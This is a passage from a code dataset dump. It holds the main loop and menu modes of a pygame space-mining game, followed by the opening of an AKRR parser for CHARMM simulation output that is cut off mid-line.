self.changeMode(campaignMode)\r\n elif b.text=='HOW TO PLAY':\r\n self.currentLevel=level(1, 'training')\r\n self.changeMode(trainingMode)\r\n elif b.text=='RANDOM MAP':\r\n randomLevelMode=mode('random level', [])\r\n self.currentLevel=level(1)\r\n self.currentLevel.getRandom()\r\n self.changeMode(randomLevelMode)\r\n elif b.text=='HELP':\r\n self.changeMode(helpPageMode)\r\n elif b.text=='EXIT':\r\n pygame.quit()\r\n sys.exit()\r\n b.buttonPressed=False\r\n self.mousePressed=(0,0)\r\n \r\n pygame.display.update()\r\n FPSCLOCK.tick(FPS)\r\n \r\n \r\n elif self.gameMode.name=='campaign' or self.gameMode.name=='random level' or self.gameMode.name=='training':\r\n #print ('started game mode')\r\n displaySurf.blit(background, (0, 0)) \r\n gravity=vector((0,0))\r\n astGravity=vector((0,0))\r\n \r\n #print('calculate gravity force for player ship')\r\n gravity=self.levelGravity.getField(self.playerShip.position)\r\n\r\n #print('for friendly planets check that player is on the orbit') \r\n for i in self.planetarySystem.sprites():\r\n if isinstance(i, frPlanet):\r\n if vecMag(vecDif(i.position, self.playerShip.position))<=i.orbitRadius+1: #+1 here used as a kind of tolerance \r\n if self.playerShip.mainEngine==False:\r\n i.takeOnOrbit(self.playerShip)\r\n\r\n #print('asteroids position and collision check')\r\n for ast in self.asteroidBelt.sprites():\r\n astGravity=self.levelGravity.getField(ast.position)\r\n astAlive=True\r\n #check on collisions with planets\r\n for i in self.planetarySystem.sprites():\r\n if pygame.sprite.collide_mask(i, ast)!=None: astAlive=False\r\n \r\n #check on collisions with borders\r\n if ast.position.x>=800 or ast.position.y>=600 or ast.position.x<=0 or ast.position.y<=0: astAlive=False\r\n #check on collision with player\r\n if pygame.sprite.collide_mask(ast, self.playerShip)!=None:\r\n self.playerShip.alive=False\r\n astAlive=False\r\n if self.deathClock==0:\r\n self.deathClock+=1\r\n shipExplosionSound.play(loops=0, maxtime=2000)\r\n if not self.paused: ast.update(astGravity, astAlive)\r\n #check on collision of two asteroids\r\n for ast2 in self.asteroidBelt.sprites():\r\n if ast2.position!=ast.position:\r\n if pygame.sprite.collide_mask(ast, ast2)!=None: ast.smashAsteroids(ast2, self.explosionGroup) \r\n \r\n #print('plasma shots collision check')\r\n for shot in self.plasmaShots.sprites():\r\n shotAlive=True\r\n if pygame.sprite.collide_mask(shot, self.playerShip)!=None:\r\n self.playerShip.alive=False\r\n shotAlive=False\r\n if self.deathClock==0:\r\n self.deathClock+=1\r\n shipExplosionSound.play(loops=0, maxtime=2000)\r\n if not self.paused: shot.update(shotAlive)\r\n \r\n #print('player collision with planet check')\r\n for i in self.planetarySystem.sprites():\r\n if pygame.sprite.collide_mask(i, self.playerShip)!=None:\r\n self.playerShip.alive=False\r\n if self.deathClock==0:\r\n self.deathClock+=1\r\n shipExplosionSound.play(loops=0, maxtime=2000)\r\n\r\n #print('finish check')\r\n \r\n if self.playerShip.mineralCount>=self.requiredMinerals:\r\n for i in self.finishGroup.sprites():\r\n if pygame.sprite.collide_mask(i, self.playerShip)!=None:\r\n self.playerShip.finish=True\r\n if self.finishClock==0:\r\n self.finishClock+=1\r\n #finishSound.play(loops=0)\r\n \r\n\r\n #print('border check')\r\n if self.playerShip.checkBorder():\r\n self.playerShip.bounce(self.playerShip.checkBorder())\r\n if self.playerShip.fuel<=0:\r\n if self.gameMode.name=='campaign': self.changeMode(deathMode)\r\n elif self.gameMode.name=='training': self.changeMode(trDeathMode)\r\n 
elif self.gameMode.name=='random level': self.changeMode(finishRandomMode)\r\n self.playerShip.kill()\r\n \r\n #minerals collision check\r\n for m in self.minerals.sprites():\r\n if pygame.sprite.collide_mask(m, self.playerShip)!=None:\r\n self.playerShip.mineralCount+=1\r\n m.kill()\r\n \r\n if not self.paused:\r\n # update the ship with engine flames\r\n self.playerShip.engineFlames()\r\n self.ships.update(gravity, self.asteroidBelt)\r\n #throw away used point in trajectory\r\n if not self.playerShip.changeTrajectory:\r\n if self.playerShip.trajectory!=[]: self.playerShip.trajectory.pop(0)\r\n \r\n \r\n #print('update asteroids')\r\n for point in self.asteroidSpawnPoints:\r\n point.update(self.asteroidBelt, self.tailGroup)\r\n\r\n #print('update planetary system')\r\n self.planetarySystem.update(self.playerShip, self.plasmaShots)\r\n\r\n #update explosions\r\n self.explosionGroup.update(self.minerals)\r\n \r\n\r\n #draw fuel level\r\n #define top left corner of the left bar of fuel\r\n currentCorner=(770, 40)\r\n if self.playerShip.fuel//1>0:\r\n for bar in range(int(self.playerShip.fuel)):\r\n fuelBar=pygame.Rect(currentCorner, (15, 40))\r\n pygame.draw.rect(displaySurf, ORANGE, fuelBar)\r\n currentCorner=(currentCorner[0]-20, currentCorner[1])\r\n if self.playerShip.fuel%1>0 and self.playerShip.fuel>0:\r\n fuelBar=pygame.Rect(currentCorner, (15, int(40*(self.playerShip.fuel%1))))\r\n pygame.draw.rect(displaySurf, ORANGE, fuelBar)\r\n\r\n #print('draw the trajectory calculate only if it is changed')\r\n if self.playerShip.onOrbit==False and self.playerShip.alive==True:\r\n if self.playerShip.changeTrajectory==True:\r\n #engineSound.play(loops=0, maxtime=1000)\r\n self.playerShip.trajectory=list(zip(*calcTrajectory(self.playerShip.position, self.playerShip.speed, self.levelGravity, self.planetarySystem))[0])\r\n self.playerShip.changeTrajectory=False\r\n trajectorySurf=pygame.Surface((WINDOWWIDTH, WINDOWHEIGHT))\r\n trajectorySurf.fill(BLACK)\r\n trajectorySurf.set_colorkey(BLACK)\r\n count=0\r\n for i in self.playerShip.trajectory:\r\n if count%10==0:\r\n pygame.draw.circle(trajectorySurf, trajColor, (int(i.x), int(i.y)), 2)\r\n count+=1\r\n trajectorySurf.set_alpha(128)\r\n displaySurf.blit(trajectorySurf, (0,0))\r\n \r\n #print('draw objects')\r\n\r\n self.tailGroup.draw(displaySurf)\r\n self.planetarySystem.draw(displaySurf)\r\n self.asteroidBelt.draw(displaySurf)\r\n self.plasmaShots.draw(displaySurf)\r\n self.startGroup.draw(displaySurf)\r\n self.explosionGroup.draw(displaySurf)\r\n self.minerals.draw(displaySurf)\r\n\r\n #draw finish active if required minerals are collected\r\n \r\n for f in self.finishGroup:\r\n if self.playerShip.mineralCount>=self.requiredMinerals and f.active==False: f.activate()\r\n self.finishGroup.draw(displaySurf)\r\n\r\n #draw player\r\n self.ships.draw(displaySurf)\r\n\r\n #draw asteroid catcher\r\n if self.playerShip.alive and not self.playerShip.finish:\r\n pygame.draw.circle(displaySurf, BLUE, (int(self.playerShip.catcherCenter.x), int(self.playerShip.catcherCenter.y)), 0)\r\n pygame.draw.circle(displaySurf, BLUE, (int(self.playerShip.catcherCenter.x), int(self.playerShip.catcherCenter.y)), int(self.playerShip.catcherRadius), 1)\r\n #draw freindly orbits and foe fire radii\r\n for p in self.planetarySystem:\r\n if isinstance(p, frPlanet):\r\n for i in p.orbit:\r\n pygame.draw.circle(displaySurf, GREEN, (int(i[0]), int(i[1])), 0)\r\n if isinstance(p, foePlanet):\r\n pygame.draw.circle(displaySurf, RED, (int(p.position.x), int(p.position.y)), 
int(p.fireRadius), 1)\r\n\r\n            \r\n\r\n            # module to see ship's movement characteristics\r\n            '''textAngle=myfont.render(\"Angle %f\" %self.playerShip.angle, 1, RED) # text of current angle\r\n            textAcc=myfont.render(\"angle to planet %f\" %((400.0 - self.playerShip.position.x)/60.0), 1, RED) # text of current angle to planet\r\n            textSpeed=myfont.render(\"Speed %f, %f\" %(self.playerShip.speed.x, self.playerShip.speed.y), 1, RED) #text of current speed\r\n            textPosition=myfont.render(\"Position %f, %f\" %(self.playerShip.position.x, self.playerShip.position.y), 1, RED) #text of current position\r\n\r\n            displaySurf.blit(textAngle, (100, 100))\r\n            displaySurf.blit(textAcc, (100, 120))\r\n            displaySurf.blit(textSpeed, (100, 140))\r\n            displaySurf.blit(textPosition, (100, 160))'''\r\n            #draw text\r\n            textMinerals=bigFont.render(\"Minerals %d / %d\" %(self.playerShip.mineralCount, self.requiredMinerals), 1, WHITE)\r\n            textFuel=bigFont.render(\"Fuel\", 1, ORANGE)\r\n            startText=smallFont.render(\"start\", 1, GREEN)\r\n            startTextWidth, startTextHeight=smallFont.size(\"start\")\r\n            displaySurf.blit(startText, (self.start.x-int(startTextWidth/2), self.start.y-20-int(startTextHeight/2)))\r\n            if self.playerShip.mineralCount>=self.requiredMinerals: finishText=smallFont.render(\"finish\", 1, PURPLE)\r\n            else: finishText=smallFont.render(\"finish\", 1, fadedPurpleColor)\r\n            finishTextWidth, finishTextHeight=smallFont.size(\"finish\")\r\n            displaySurf.blit(finishText, (self.finish.x-int(finishTextWidth/2), self.finish.y-20-int(finishTextHeight/2)))\r\n            displaySurf.blit(textMinerals, (10,10))\r\n            displaySurf.blit(textFuel, (590,10))\r\n\r\n            #if death happened wait for 40 frames to show explosion animation\r\n            if self.deathClock>0:\r\n                if self.deathClock>=40:\r\n                    if self.gameMode.name=='campaign': self.changeMode(deathMode)\r\n                    elif self.gameMode.name=='training': self.changeMode(trDeathMode)\r\n                    elif self.gameMode.name=='random level': self.changeMode(finishRandomMode)\r\n                    self.deathClock=0\r\n                else: self.deathClock+=1\r\n\r\n            #if finish happened wait for 40 frames to show explosion animation\r\n            if self.finishClock>0:\r\n                if self.finishClock>=40:\r\n                    if self.gameMode.name=='campaign': self.changeMode(finishMode)\r\n                    elif self.gameMode.name=='training': self.changeMode(trFinishMode)\r\n                    elif self.gameMode.name=='random level': self.changeMode(finishRandomMode)\r\n                    self.finishClock=0\r\n                else: self.finishClock+=1\r\n            \r\n            #if game is paused draw labels for pause and cover with a semitransparent surface\r\n            if self.paused:\r\n                coverSurface=pygame.Surface((WINDOWWIDTH, WINDOWHEIGHT))\r\n                coverSurface.set_alpha(100)\r\n                displaySurf.blit(coverSurface, (0,0))\r\n                for l in self.pausedLabels:\r\n                    l.draw(displaySurf)\r\n            \r\n            \r\n            pygame.display.update()\r\n            FPSCLOCK.tick(FPS)\r\n\r\n        elif self.gameMode.name=='death':\r\n            displaySurf.blit(menuBackground, (0,0))\r\n            headText=hugeFont.render(\"Your ship is crashed\", 1, titleColor)\r\n            headTextWidth, headTextHeight=hugeFont.size(\"Your ship is crashed\")\r\n            displaySurf.blit(headText, (400-int(headTextWidth/2), 230-int(headTextHeight/2)))\r\n            #draw death menu\r\n            for b in self.gameMode.buttons:\r\n                b.update(displaySurf, self.mousePressed)\r\n                #??if any button pressed - change game mode accordingly\r\n                if b.buttonPressed==True:\r\n                    if b.text=='RETRY LEVEL':\r\n                        self.currentLevel.load(self.currentLevel.number)\r\n                        self.changeMode(campaignMode) \r\n                    elif b.text=='MAIN MENU':\r\n                        self.changeMode(mainMenuMode)\r\n                        f=open(\"currentLevel\", 'r+')\r\n                        f.write(\"%d\\n\" 
%self.currentLevel.number)\r\n f.close()\r\n b.buttonPressed=False\r\n self.mousePressed=(0,0) \r\n \r\n pygame.display.update()\r\n FPSCLOCK.tick(FPS)\r\n\r\n elif self.gameMode.name=='training death':\r\n displaySurf.blit(menuBackground, (0,0))\r\n headText=hugeFont.render(\"Your ship is crashed\", 1, titleColor)\r\n headTextWidth, headTextHeight=hugeFont.size(\"Your ship is crashed\")\r\n displaySurf.blit(headText, (400-int(headTextWidth/2), 230-int(headTextHeight/2)))\r\n #draw death menu\r\n for b in self.gameMode.buttons:\r\n b.update(displaySurf, self.mousePressed)\r\n #??if any button pressed - change game mode accordingly\r\n if b.buttonPressed==True:\r\n if b.text=='RETRY LEVEL':\r\n self.currentLevel.load(self.currentLevel.number, 'training')\r\n self.changeMode(trainingMode) \r\n elif b.text=='MAIN MENU':\r\n self.changeMode(mainMenuMode)\r\n b.buttonPressed=False\r\n self.mousePressed=(0,0) \r\n \r\n pygame.display.update()\r\n FPSCLOCK.tick(FPS)\r\n\r\n elif self.gameMode.name=='finish':\r\n displaySurf.blit(menuBackground, (0,0))\r\n headText=hugeFont.render(\"Mission accomplished\", 1, titleColor)\r\n headTextWidth, headTextHeight=hugeFont.size(\"Mission accomplished\")\r\n displaySurf.blit(headText, (400-int(headTextWidth/2), 230-int(headTextHeight/2)))\r\n #draw death menu\r\n for b in self.gameMode.buttons:\r\n b.update(displaySurf, self.mousePressed)\r\n #??if any button pressed - change game mode accordingly\r\n if b.buttonPressed==True:\r\n if b.text=='RETRY LEVEL':\r\n self.currentLevel.load(self.currentLevel.number)\r\n self.changeMode(campaignMode) \r\n elif b.text=='MAIN MENU':\r\n self.changeMode(mainMenuMode)\r\n f=open(\"currentLevel\", 'r+')\r\n f.write(\"%d\\n\" %self.currentLevel.number)\r\n f.close()\r\n elif b.text=='NEXT LEVEL':\r\n self.currentLevel.load(self.currentLevel.number+1)\r\n self.changeMode(campaignMode)\r\n b.buttonPressed=False\r\n self.mousePressed=(0,0) \r\n \r\n pygame.display.update()\r\n FPSCLOCK.tick(FPS)\r\n \r\n elif self.gameMode.name=='training finish':\r\n displaySurf.blit(menuBackground, (0,0))\r\n headText=hugeFont.render(\"Mission accomplished\", 1, titleColor)\r\n headTextWidth, headTextHeight=hugeFont.size(\"Mission accomplished\")\r\n displaySurf.blit(headText, (400-int(headTextWidth/2), 230-int(headTextHeight/2)))\r\n #draw death menu\r\n for b in self.gameMode.buttons:\r\n b.update(displaySurf, self.mousePressed)\r\n #??if any button pressed - change game mode accordingly\r\n if b.buttonPressed==True:\r\n if b.text=='RETRY LEVEL':\r\n self.currentLevel.load(self.currentLevel.number, 'training')\r\n self.changeMode(trainingMode) \r\n elif b.text=='MAIN MENU':\r\n self.changeMode(mainMenuMode)\r\n elif b.text=='NEXT LEVEL':\r\n self.currentLevel.load(self.currentLevel.number+1, 'training')\r\n self.changeMode(trainingMode)\r\n b.buttonPressed=False\r\n self.mousePressed=(0,0) \r\n \r\n pygame.display.update()\r\n FPSCLOCK.tick(FPS)\r\n\r\n elif self.gameMode.name=='finish random':\r\n displaySurf.blit(menuBackground, (0,0))\r\n headText=hugeFont.render(\"Mission accomplished\", 1, titleColor)\r\n headTextWidth, headTextHeight=hugeFont.size(\"Mission accomplished\")\r\n displaySurf.blit(headText, (400-int(headTextWidth/2), 230-int(headTextHeight/2)))\r\n #draw death menu\r\n for b in self.gameMode.buttons:\r\n b.update(displaySurf, self.mousePressed)\r\n #??if any button pressed - change game mode accordingly\r\n if b.buttonPressed==True:\r\n if b.text=='NEW RANDOM MAP':\r\n randomLevelMode=mode('random level', [])\r\n 
self.currentLevel.getRandom()\r\n                        self.changeMode(randomLevelMode)\r\n                    elif b.text=='MAIN MENU':\r\n                        self.changeMode(mainMenuMode)\r\n                    elif b.text=='RETRY LEVEL':\r\n                        randomLevelMode=mode('random level', [])\r\n                        self.changeMode(randomLevelMode)\r\n                    b.buttonPressed=False\r\n                    self.mousePressed=(0,0) \r\n            \r\n            pygame.display.update()\r\n            FPSCLOCK.tick(FPS)\r\n\r\n        elif self.gameMode.name=='help':\r\n            displaySurf.blit(helpPageImg, (0,0))\r\n            #draw help page\r\n            for b in self.gameMode.buttons:\r\n                b.update(displaySurf, self.mousePressed)\r\n                #??if any button pressed - change game mode accordingly\r\n                if b.buttonPressed==True:\r\n                    if b.text=='MAIN MENU':\r\n                        self.changeMode(mainMenuMode)\r\n                    b.buttonPressed=False\r\n                    self.mousePressed=(0,0) \r\n            \r\n            pygame.display.update()\r\n            FPSCLOCK.tick(FPS)\r\n\r\n        elif self.gameMode.name=='win':\r\n            displaySurf.blit(menuBackground, (0,0))\r\n            headText1=hugeFont.render(\"You accomplished all the missions\", 1, titleColor)\r\n            headTextWidth1, headTextHeight1=hugeFont.size(\"You accomplished all the missions\")\r\n            displaySurf.blit(headText1, (400-int(headTextWidth1/2), 170-int(headTextHeight1/2)))\r\n            headText2=hugeFont.render(\"Congratulations\", 1, titleColor)\r\n            headTextWidth2, headTextHeight2=hugeFont.size(\"Congratulations\")\r\n            displaySurf.blit(headText2, (400-int(headTextWidth2/2), 230-int(headTextHeight2/2)))\r\n            #draw win menu\r\n            for b in self.gameMode.buttons:\r\n                b.update(displaySurf, self.mousePressed)\r\n                #??if any button pressed - change game mode accordingly\r\n                if b.buttonPressed==True:\r\n                    if b.text=='MAIN MENU':\r\n                        self.changeMode(mainMenuMode)\r\n                    b.buttonPressed=False\r\n                    self.mousePressed=(0,0) \r\n            \r\n            pygame.display.update()\r\n            FPSCLOCK.tick(FPS)\r\n\r\n        elif self.gameMode.name=='training win':\r\n            displaySurf.blit(menuBackground, (0,0))\r\n            headText1=hugeFont.render(\"You accomplished the training\", 1, titleColor)\r\n            headTextWidth1, headTextHeight1=hugeFont.size(\"You accomplished the training\")\r\n            displaySurf.blit(headText1, (400-int(headTextWidth1/2), 170-int(headTextHeight1/2)))\r\n            headText2=hugeFont.render(\"Move to the campaign\", 1, titleColor)\r\n            headTextWidth2, headTextHeight2=hugeFont.size(\"Move to the campaign\")\r\n            displaySurf.blit(headText2, (400-int(headTextWidth2/2), 230-int(headTextHeight2/2)))\r\n            #draw training win menu\r\n            for b in self.gameMode.buttons:\r\n                b.update(displaySurf, self.mousePressed)\r\n                #??if any button pressed - change game mode accordingly\r\n                if b.buttonPressed==True: \r\n                    if b.text=='MAIN MENU':\r\n                        self.changeMode(mainMenuMode)\r\n                    elif b.text=='CAMPAIGN':\r\n                        self.currentLevel=level(1)\r\n                        self.changeMode(campaignMode)\r\n                    b.buttonPressed=False\r\n                    self.mousePressed=(0,0) \r\n            \r\n            pygame.display.update()\r\n            FPSCLOCK.tick(FPS)\r\n        \r\n        \r\n    def changeMode(self, nextMode):\r\n        global campaignMode\r\n        global randomLevelMode\r\n        if nextMode.name=='campaign':\r\n            if not self.currentLevel.winSituation:\r\n                campaignMode=mode('campaign', [])\r\n                #set planets and other objects from level\r\n                self.planetarySystem=self.currentLevel.planetarySystem\r\n                self.asteroidBelt=self.currentLevel.asteroidBelt\r\n                self.tailGroup=self.currentLevel.tailGroup\r\n                self.startGroup=self.currentLevel.startGroup\r\n                self.finishGroup=self.currentLevel.finishGroup\r\n                self.asteroidSpawnPoints=self.currentLevel.asteroidSpawnPoints\r\n                self.plasmaShots=self.currentLevel.plasmaShots\r\n                self.explosionGroup=self.currentLevel.explosionGroup\r\n                self.start=self.currentLevel.start\r\n                
self.finish=self.currentLevel.finish\r\n                #set group of minerals sprites\r\n                self.minerals=self.currentLevel.minerals\r\n                self.requiredMinerals=self.currentLevel.requiredMinerals\r\n                self.pausedLabels=self.currentLevel.pausedLabels\r\n                #create gravity field\r\n                self.levelGravity=gravityField(self.planetarySystem)\r\n                #set player's ship\r\n                self.playerShip = battleShip(self.start)\r\n                self.ships=pygame.sprite.Group()\r\n                self.ships.add(self.playerShip)\r\n                self.gameMode=campaignMode\r\n            else:\r\n                self.gameMode=winMenuMode\r\n        elif nextMode.name=='training':\r\n            if not self.currentLevel.trWinSituation:\r\n                self.planetarySystem=self.currentLevel.planetarySystem\r\n                self.asteroidBelt=self.currentLevel.asteroidBelt\r\n                self.tailGroup=self.currentLevel.tailGroup\r\n                self.startGroup=self.currentLevel.startGroup\r\n                self.finishGroup=self.currentLevel.finishGroup\r\n                self.asteroidSpawnPoints=self.currentLevel.asteroidSpawnPoints\r\n                self.plasmaShots=self.currentLevel.plasmaShots\r\n                self.explosionGroup=self.currentLevel.explosionGroup\r\n                self.start=self.currentLevel.start\r\n                self.finish=self.currentLevel.finish\r\n                #set group of minerals sprites\r\n                self.minerals=self.currentLevel.minerals\r\n                self.requiredMinerals=self.currentLevel.requiredMinerals\r\n                self.pausedLabels=self.currentLevel.pausedLabels\r\n                #create gravity field\r\n                self.levelGravity=gravityField(self.planetarySystem)\r\n                #set player's ship\r\n                self.playerShip = battleShip(self.currentLevel.start)\r\n                self.ships=pygame.sprite.Group()\r\n                self.ships.add(self.playerShip)\r\n                self.paused=True\r\n                self.gameMode=trainingMode\r\n            else:\r\n                self.gameMode=trWinMenuMode\r\n        elif nextMode.name=='death':\r\n            self.gameMode=deathMode\r\n        elif nextMode.name=='training death':\r\n            self.gameMode=trDeathMode\r\n        elif nextMode.name=='training finish':\r\n            self.gameMode=trFinishMode\r\n        elif nextMode.name=='main menu':\r\n            self.gameMode=mainMenuMode\r\n        elif nextMode.name=='finish':\r\n            self.gameMode=finishMode\r\n        elif nextMode.name=='help':\r\n            self.gameMode=helpPageMode\r\n        elif nextMode.name=='random level':\r\n            #set planets and other objects from level\r\n            self.planetarySystem=self.currentLevel.planetarySystem\r\n            self.asteroidBelt=self.currentLevel.asteroidBelt\r\n            self.tailGroup=self.currentLevel.tailGroup\r\n            self.startGroup=self.currentLevel.startGroup\r\n            self.finishGroup=self.currentLevel.finishGroup\r\n            self.asteroidSpawnPoints=self.currentLevel.asteroidSpawnPoints\r\n            self.plasmaShots=self.currentLevel.plasmaShots\r\n            self.explosionGroup=self.currentLevel.explosionGroup\r\n            self.start=self.currentLevel.start\r\n            self.finish=self.currentLevel.finish\r\n            #set group of minerals sprites\r\n            self.minerals=self.currentLevel.minerals\r\n            self.requiredMinerals=0\r\n            self.pausedLabels=self.currentLevel.pausedLabels\r\n            #create gravity field\r\n            self.levelGravity=gravityField(self.planetarySystem)\r\n            #set player's ship\r\n            self.playerShip = battleShip(self.currentLevel.start)\r\n            self.ships=pygame.sprite.Group()\r\n            self.ships.add(self.playerShip)\r\n            #set group of minerals sprites\r\n            self.minerals=pygame.sprite.Group()\r\n            self.gameMode=randomLevelMode\r\n        elif nextMode.name=='finish random':\r\n            self.gameMode=finishRandomMode\r\n\r\n    \r\n#construct main menu mode\r\nmainMenuButtons=[]\r\nmainMenuButtons.append(button((400, 300), buttonImg, buttonPressedImg, 'NEW CAMPAIGN'))\r\nmainMenuButtons.append(button((400, 350), buttonImg, buttonPressedImg, 'RESUME CAMPAIGN'))\r\nmainMenuButtons.append(button((400, 400), buttonImg, buttonPressedImg, 'HOW TO 
PLAY'))\r\nmainMenuButtons.append(button((400, 450), buttonImg, buttonPressedImg, 'RANDOM MAP'))\r\nmainMenuButtons.append(button((400, 500), buttonImg, buttonPressedImg, 'HELP'))\r\nmainMenuButtons.append(button((400, 550), buttonImg, buttonPressedImg, 'EXIT'))\r\n\r\nmainMenuMode=mode('main menu', mainMenuButtons)\r\n\r\n#construct campaign mode\r\ncampaignMode=mode('campaign', [])\r\n\r\n#construct random level mode\r\nrandomLevelMode=mode('random level', [])\r\n\r\n#construct training mode\r\ntrainingMode=mode('training', [])\r\n\r\n#construct death menu mode\r\ndeathModeButtons=[]\r\ndeathModeButtons.append(button((400, 450), buttonImg, buttonPressedImg, 'RETRY LEVEL'))\r\ndeathModeButtons.append(button((400, 510), buttonImg, buttonPressedImg, 'MAIN MENU'))\r\ndeathMode=mode('death', deathModeButtons)\r\n\r\n#construct death in training menu mode\r\ntrDeathModeButtons=[]\r\ntrDeathModeButtons.append(button((400, 450), buttonImg, buttonPressedImg, 'RETRY LEVEL'))\r\ntrDeathModeButtons.append(button((400, 510), buttonImg, buttonPressedImg, 'MAIN MENU'))\r\ntrDeathMode=mode('training death', trDeathModeButtons)\r\n\r\n#construct finish menu mode\r\nfinishMenuButtons=[]\r\nfinishMenuButtons.append(button((400, 420), buttonImg, buttonPressedImg, 'NEXT LEVEL'))\r\nfinishMenuButtons.append(button((400, 480), buttonImg, buttonPressedImg, 'RETRY LEVEL'))\r\nfinishMenuButtons.append(button((400, 540), buttonImg, buttonPressedImg, 'MAIN MENU'))\r\nfinishMode=mode('finish', finishMenuButtons)\r\n\r\n#construct training finish menu mode\r\ntrFinishMenuButtons=[]\r\ntrFinishMenuButtons.append(button((400, 420), buttonImg, buttonPressedImg, 'NEXT LEVEL'))\r\ntrFinishMenuButtons.append(button((400, 480), buttonImg, buttonPressedImg, 'RETRY LEVEL'))\r\ntrFinishMenuButtons.append(button((400, 540), buttonImg, buttonPressedImg, 'MAIN MENU'))\r\ntrFinishMode=mode('training finish', trFinishMenuButtons)\r\n\r\n#construct finish random level mode\r\nfinishRandomButtons=[]\r\nfinishRandomButtons.append(button((400, 420), buttonImg, buttonPressedImg, 'NEW RANDOM MAP'))\r\nfinishRandomButtons.append(button((400, 480), buttonImg, buttonPressedImg, 'RETRY LEVEL'))\r\nfinishRandomButtons.append(button((400, 540), buttonImg, buttonPressedImg, 'MAIN MENU'))\r\nfinishRandomMode=mode('finish random', finishRandomButtons)\r\n\r\n#construct help page\r\nhelpPageButtons=[]\r\nhelpPageButtons.append(button((400, 540), buttonImg, buttonPressedImg, 'MAIN MENU'))\r\nhelpPageMode=mode('help', helpPageButtons)\r\n\r\n#construct win menu mode\r\nwinButtons=[]\r\nwinButtons.append(button((400, 540), buttonImg, buttonPressedImg, 'MAIN MENU'))\r\nwinMenuMode=mode('win', winButtons)\r\n\r\n#construct training win menu mode\r\ntrWinButtons=[]\r\ntrWinButtons.append(button((400, 480), buttonImg, buttonPressedImg, 'CAMPAIGN'))\r\ntrWinButtons.append(button((400, 540), buttonImg, buttonPressedImg, 'MAIN MENU'))\r\ntrWinMenuMode=mode('training win', trWinButtons)\r\n\r\n\r\ndef main():\r\n\r\n DISPLAYSURF.fill(WHITE)\r\n DISPLAYSURF.set_colorkey(WHITE)\r\n pygame.display.update()\r\n\r\n spaceGame=game(mainMenuMode)\r\n keyInputHandler=inputHandler()\r\n previousKeys=pygame.key.get_pressed()\r\n\r\n \r\n while True:\r\n\r\n spaceGame.update(DISPLAYSURF)\r\n\r\n keys=pygame.key.get_pressed()\r\n\r\n keyInputHandler.update(keys, previousKeys, spaceGame)\r\n\r\n previousKeys=keys\r\n\r\nif __name__== '__main__':\r\n main()\r\n","sub_path":"Space adventures.py","file_name":"Space 
adventures.py","file_ext":"py","file_size_in_byte":84513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"454614944","text":"import re\nimport os\nimport sys\nfrom akrr.parsers.akrrappkeroutputparser import AppKerOutputParser\n\n\ndef process_appker_output(appstdout=None, stdout=None, stderr=None, geninfo=None, proclog=None, \n resource_appker_vars=None):\n # set App Kernel Description\n parser = AppKerOutputParser(\n name='charmm',\n version=1,\n description=\"CHARMM: Chemistry at Harvard Macromolecular Mechanics\",\n url='http://www.charmm.org',\n measurement_name='CHARMM'\n )\n # set obligatory parameters and statistics\n # set common parameters and statistics\n parser.add_common_must_have_params_and_stats()\n # set app kernel custom sets\n parser.add_must_have_parameter('App:Version')\n parser.add_must_have_parameter('Input:Number of Angles')\n parser.add_must_have_parameter('Input:Number of Atoms')\n parser.add_must_have_parameter('Input:Number of Bonds')\n parser.add_must_have_parameter('Input:Number of Dihedrals')\n parser.add_must_have_parameter('Input:Number of Steps')\n parser.add_must_have_parameter('Input:Timestep')\n\n parser.add_must_have_statistic('Molecular Dynamics Simulation Performance')\n parser.add_must_have_statistic('Time Spent in External Energy Calculation')\n parser.add_must_have_statistic('Time Spent in Integration')\n parser.add_must_have_statistic('Time Spent in Internal Energy Calculation')\n parser.add_must_have_statistic('Time Spent in Non-Bond List Generation')\n parser.add_must_have_statistic('Time Spent in Waiting (Load Unbalance-ness)')\n parser.add_must_have_statistic('User Time')\n parser.add_must_have_statistic('Wall Clock Time')\n\n # parse common parameters and statistics\n parser.parse_common_params_and_stats(appstdout, stdout, stderr, geninfo, resource_appker_vars)\n\n # read output\n lines = []\n if os.path.isfile(appstdout):\n fin = open(appstdout, \"rt\")\n lines = fin.readlines()\n fin.close()\n\n # process the output\n parser.successfulRun = False\n wall_clock_time = 0.0\n num_steps = 0\n step_size = 0.0\n time_breakdown_columns = None\n num_atoms = 0\n num_bonds = 0\n num_angles = 0\n num_dihedrals = 0\n\n j = 0\n while j < len(lines):\n\n m0 = re.search(r'\\s+Chemistry at HARvard Macromolecular Mechanics', lines[j])\n m1 = re.search(r'\\sVersion\\s+([\\da-zA-Z]+)', lines[j + 1])\n if m0 and m1:\n parser.set_parameter(\"App:Version\", m1.group(1).strip())\n\n if re.search(r'Summary of the structure file counters', lines[j]):\n j += 1\n for k in range(256):\n if re.search(r'CHARMM>', lines[j]):\n break\n\n m = re.search(r'Number of atoms\\s+=\\s+(\\d+)', lines[j])\n if m:\n num_atoms += int(m.group(1).strip())\n\n m = re.search(r'Number of bonds\\s+=\\s+(\\d+)', lines[j])\n if m:\n num_bonds += int(m.group(1).strip())\n\n m = re.search(r'Number of angles\\s+=\\s+(\\d+)', lines[j])\n if m:\n num_angles += int(m.group(1).strip())\n\n m = re.search(r'Number of dihedrals\\s+=\\s+(\\d+)', lines[j])\n if m:\n num_dihedrals += int(m.group(1).strip())\n\n j += 1\n\n if re.search(r' found', lines[j]):\n j += 1\n for k in range(256):\n if re.search(r'NUMBER OF DEGREES OF FREEDOM', lines[j]):\n break\n\n m = re.search(r'NSTEP\\s+=\\s+(\\d+)', lines[j])\n if m:\n num_steps = int(m.group(1).strip())\n parser.set_parameter(\"Input:Number of Steps\", num_steps)\n\n if re.search(r'TIME STEP\\s+=', lines[j]):\n m = re.search(r'([\\d\\-Ee.]+)\\s+PS', lines[j])\n if m:\n step_size = 1000.0 * 
